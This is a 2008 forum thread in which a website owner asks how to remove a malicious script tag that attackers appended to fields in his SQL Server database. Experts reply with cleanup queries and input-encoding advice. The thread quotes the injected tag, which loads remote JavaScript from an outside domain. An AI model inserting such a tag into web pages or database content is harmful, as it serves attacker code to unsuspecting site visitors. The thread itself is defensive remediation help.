Solved

Need to remove an 'unauthorized' script from database fields - help/suggestions

Posted on 2008-06-16
12
442 Views
Last Modified: 2013-11-15
Here's the deal, som jerk-offs infiltrated my website database with this:

<script src=http://www.clsidw.com/b.js></script>

They were able to insert this into some of the fields in my database, and my most recent backup was done after they did it, so I can't go back. Now, I need to get into the database and erase this entry in whatever fields they got into.

1 What is the fastest way to accomplish this?

2 What database software should I use keeping in mind I probably will never use it again, so cost IS a consideration.

3 Is there a way to clear this automatically or in a batch?

FWIW, they DID NOT overwrite the fields, they simply ADDED this to them.
0
Comment
Question by:bishopandsix
  • 6
  • 5
12 Comments
 
LVL 24

Expert Comment

by:Tomas Helgi Johannsson
ID: 21798262
        HI!

Have you tried Toad for MySQL (www.toadsoft.com) ?
It's free and very good DBA tool to make changes to your database.

What you can do is do an update on each table by and put a empty string in stead of the script string for fields that are
just chars / varchars.
With text fields (TEXT, MEDIUM TEXT, LONG TEXT) or BLOB fields  it might be a little more trickier.
What you can do is use mysqldump to dump the database(s) to an sql file and use
texteditor (like WordPad/Notepad if you use WIndows) to search and replace the script text with blanks
and then restore the database with the altered backup sql file.
See the manual for further info
http://dev.mysql.com/doc/refman/5.0/en/mysqldump.html

Regards,
   Tomas Helgi
0
 
LVL 7

Expert Comment

by:Zippit
ID: 21798294
this is a pretty standard attack against websites that allow HTML embedded into their comments.  If it's in comments and you don't mind just blowing away the offending comment (not other comments, just the one with the offending html in it), then something like the following will work (run this in a query tool):

DELETE FROM tbl_myComment_Table
WHERE str_text_field like '%http://www.clsidw.com/b.js%'


0
 

Author Comment

by:bishopandsix
ID: 21798300
I'm sorry, I think my Database is MS SQL, does Toad work with that? I am a complete beginner when it comes to database stuff.
0
 
LVL 7

Expert Comment

by:Zippit
ID: 21798303
If you are running ASP or ASP.NET it would be a good idea to HTMLEncode all user submitted input.  This will prevent this attack from working in the future.  Use a line like the following to do so:


userInput = Server.HtmlEncode(userInput)
0
 

Author Comment

by:bishopandsix
ID: 21798370
"this is a pretty standard attack against websites that allow HTML embedded into their comments.  If it's in comments and you don't mind just blowing away the offending comment (not other comments, just the one with the offending html in it), then something like the following will work (run this in a query tool):

DELETE FROM tbl_myComment_Table
WHERE str_text_field like '%http://www.clsidw.com/b.js%'"

If I do this, will it eliminate ONLY the added script, or will it eliminate everything in the field? Also, what software should I use to do this with?
0
 

Author Comment

by:bishopandsix
ID: 21798392
"If you are running ASP or ASP.NET it would be a good idea to HTMLEncode all user submitted input.  This will prevent this attack from working in the future.  Use a line like the following to do so:


userInput = Server.HtmlEncode(userInput)"

If I do this, will it still allow me to use HTML in some of my fields? What does this function do exactly.
0
Zoho SalesIQ

Hassle-free live chat software re-imagined for business growth. 2 users, always free.

 
LVL 7

Accepted Solution

by:
Zippit earned 500 total points
ID: 21798790
The delete will delete all data in the entire affected record.  If the malicious script tag is in a comment you probably want to do that anyway.  If you just want to remove the "script" tag then you are going to need to write a program/script to loop through all your records and update the field with the value with the malicious script tag removed.

If you want to see what records will be deleted run the following:

SELECT *
FROM  tbl_myComment_Table
WHERE str_text_field like '%http://www.clsidw.com/b.js%'

You will need a query tool to run this against.  If you are using MSSQL then use either Query Analyzer or SQL Server Management Studio (they come with SQL Server Standard or Enterprise).
0
 
LVL 7

Expert Comment

by:Zippit
ID: 21798801

userInput = Server.HtmlEncode(userInput)"

If I do this, will it still allow me to use HTML in some of my fields? What does this function do exactly.

"YOU" can as the administrator.  But if you put that code in your comments submission code (or wherever the user's submitted the malicious script tags) then they will no longer be able to use HTML of any kind.

If you want them to be able to continue using HTML then you will have to write a "smart" filter that strips out possibly malicious tags like <script>.  But that's easier said then done.
0
 

Author Comment

by:bishopandsix
ID: 21799232
Still need some help with what software to use to accomplish the database cleaning. The database is MSSQL as far as I know.
0
 
LVL 7

Expert Comment

by:Zippit
ID: 21807259
what product are you using for your site?  If it's open source I will take a look for the schema and might be able to whip something up real quick.

Is the site hosted on your server or are you renting server space/web space?
0
 

Author Comment

by:bishopandsix
ID: 21808309
Absolutely no  idea what product. I'll get with my host in the morning and ask.
0
 

Author Closing Comment

by:bishopandsix
ID: 31467804
Thanks, your help got me going in the right direction and I was able to clean the records with only a slight amount of additional info I found by doing some Google searches.
0

Featured Post

Microsoft Certification Exam 74-409

Veeam® is happy to provide the Microsoft community with a study guide prepared by MVP and MCT, Orin Thomas. This guide will take you through each of the exam objectives, helping you to prepare for and pass the examination.

Join & Write a Comment

Suggested Solutions

Many companies are looking to get out of the datacenter business and to services like Microsoft Azure to provide Infrastructure as a Service (IaaS) solutions for legacy client server workloads, rather than continuing to make capital investments in h…
Password hashing is better than message digests or encryption, and you should be using it instead of message digests or encryption.  Find out why and how in this article, which supplements the original article on PHP Client Registration, Login, Logo…
Via a live example, show how to backup a database, simulate a failure backup the tail of the database transaction log and perform the restore.
Via a live example, show how to setup several different housekeeping processes for a SQL Server.

707 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

18 Experts available now in Live!

Get 1:1 Help Now